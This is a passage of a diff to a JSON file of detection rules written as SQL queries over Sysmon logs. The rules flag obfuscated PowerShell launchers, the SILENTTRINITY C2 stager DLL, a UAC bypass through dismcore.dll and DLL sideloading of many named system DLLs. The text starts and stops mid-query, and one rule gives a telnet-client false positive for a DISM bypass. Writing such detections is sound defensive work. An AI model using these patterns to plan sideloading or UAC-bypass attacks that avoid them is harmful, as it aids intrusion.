ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE 